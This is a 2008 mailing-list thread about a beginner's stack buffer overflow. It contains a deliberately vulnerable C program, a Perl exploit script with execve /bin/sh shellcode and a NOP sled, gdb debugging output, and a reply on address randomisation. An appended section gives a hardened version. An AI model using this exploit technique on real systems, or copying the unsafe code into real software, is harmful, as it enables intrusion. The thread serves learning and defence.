Penetration Testing mailing list archives
Re: Simple Buffer Overflow
From: "Ronald van der Westen" <rvdwesten () gmail com>
Date: Mon, 14 Jan 2008 15:11:32 +0100
Debian 2.6.18 is using Address Space Randomization; this means that your stack will be at another address every run. It is not possible to exploit this with a hardcoded return address.

Cheers,
-p

On 10 Jan 2008 02:09:46 -0000, <loki6 () orange nl> wrote:
Hi there and thank you for reading this,

I'm new to the pen-test area and want to study a simple buffer overflow exploit on debian 2.6.18-5-686. As I've said I'm new to this field and my goal is to be able to anticipate possible buffer overflow exploits.

I've created this simple script: "test.c":

[code]
#include <stdio.h>
#include <string.h>   /* needed for strcpy() */

int main(int argc, char **argv)
{
    char buffer[256];

    if (argc == 1) {
        printf("Usage: %s (input)", argv[0]);
        return 1;   /* without this, strcpy() below would dereference a NULL argv[1] */
    }
    strcpy(buffer, argv[1]);   /* unbounded copy into a 256-byte stack buffer: the overflow under study */
    printf(buffer);            /* user input used directly as the format string */
    return 0;
}
[/code]

Then I'm trying to exploit it with:

[code]
#!/usr/bin/perl
$ret = "/x90/x9a/xbf";
$shellcode = "\xb0\x0b".
             "\x99".
             "\x52".
             "\x68\x2f\x2f\x73\x68".
             "\x68\x2f\x62\x69\x6e".
             "\x89\xe3".
             "\x52".
             "\x53".
             "\x89\xe1".
             "\xcd\x80";
$exploit = "\x90" x 235;
$exploit .= $shellcode;
$exploit .= $ret;
system("./a.out $exploit");
[/code]

The shellcode is an execve /bin/sh. When I run the perl script it simply returns my bash prompt. So the exploit didn't work. When I type 'exit' afterwards, I'm dropped from the su shell I was in previously, confirming there isn't a "/bin/sh" process.

Now the funny thing is when I overflow the buffer of a.out in gdb, with:

run `perl -e 'print "A"x262'`

Program received signal SIGSEGV, Segmentation fault
0x08048412 in main ()

It doesn't overflow the EIP, because when I use:

i r

It says:

eip 0x8048412 0x8048412 <main+126>

The first time I tried today it overflowed the EIP correctly and I didn't change anything. ECX is 0x41414141 and ESP is 0x4141413d, EBP is 0xbf004141. Since stack and frame pointer both have 41 in them I figure part of them is overflowed. Why not the Extended Instruction Pointer?

I was wondering if someone was able to help me with this, because I really want to get the hang of this. I don't know if I got the NOP sled and return address right either, because when using GDB:

x/s $esp

I get:

0x4141413d: <Address 0x4141413d out of bounds>

I'm kinda stuck from there.
My problem in short:
- How do I get a reliable return address with GDB
- How do I determine the length of the NOP sled
- How do I test shellcode

Thanks for reading this.. Thanks for any help, pointers and advice.

ironmonkey6

------------------------------------------------------------------------
This list is sponsored by: Cenzic
Need to secure your web apps NOW? Cenzic finds more, "real" vulnerabilities fast. Click to try it, buy it or download a solution FREE today!
http://www.cenzic.com/downloads
------------------------------------------------------------------------
--
Ronald van der Westen
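Taking the reply's point from the defender's side, here is an added example (not code from the thread) that pairs a hardened counterpart of the posted test.c with a check of the kernel ASLR setting the reply refers to; it assumes a Linux host exposing the /proc/sys/kernel/randomize_va_space sysctl and a C99 compiler.

```c
/* Hardened counterpart of the posted test.c (added example, not from the thread).
 * The original copies argv[1] into a 256-byte stack buffer with strcpy() and
 * then passes the buffer to printf() as the format string; both are fixed here. */
#include <stdio.h>
#include <string.h>

#define BUFSZ 256

/* Copy src into dst only if it fits, terminating NUL included.
 * Returns 0 on success, -1 if the input is too long. Oversized input is rejected
 * rather than truncated so the caller can report it instead of losing data. */
int copy_input(char *dst, size_t dstsz, const char *src)
{
    size_t n = strlen(src);
    if (n >= dstsz) {
        return -1;
    }
    memcpy(dst, src, n + 1);
    return 0;
}

/* Read the ASLR sysctl: 0 = off, 1 = stack/mmap/vdso randomised, 2 = brk too.
 * Returns -1 where the file is not readable (non-Linux or restricted /proc). */
int aslr_setting(void)
{
    FILE *f = fopen("/proc/sys/kernel/randomize_va_space", "r");
    int v;
    if (f == NULL) return -1;
    if (fscanf(f, "%d", &v) != 1) v = -1;
    fclose(f);
    return v;
}

int main(int argc, char **argv)
{
    char buffer[BUFSZ];
    if (argc != 2) {
        fprintf(stderr, "Usage: %s (input)\n", argv[0]);
        return 1;
    }
    if (copy_input(buffer, sizeof buffer, argv[1]) != 0) {
        fprintf(stderr, "input too long (max %d bytes)\n", BUFSZ - 1);
        return 1;
    }
    printf("%s\n", buffer);   /* fixed format string; user data is an argument */
    printf("randomize_va_space = %d\n", aslr_setting());
    return 0;
}
```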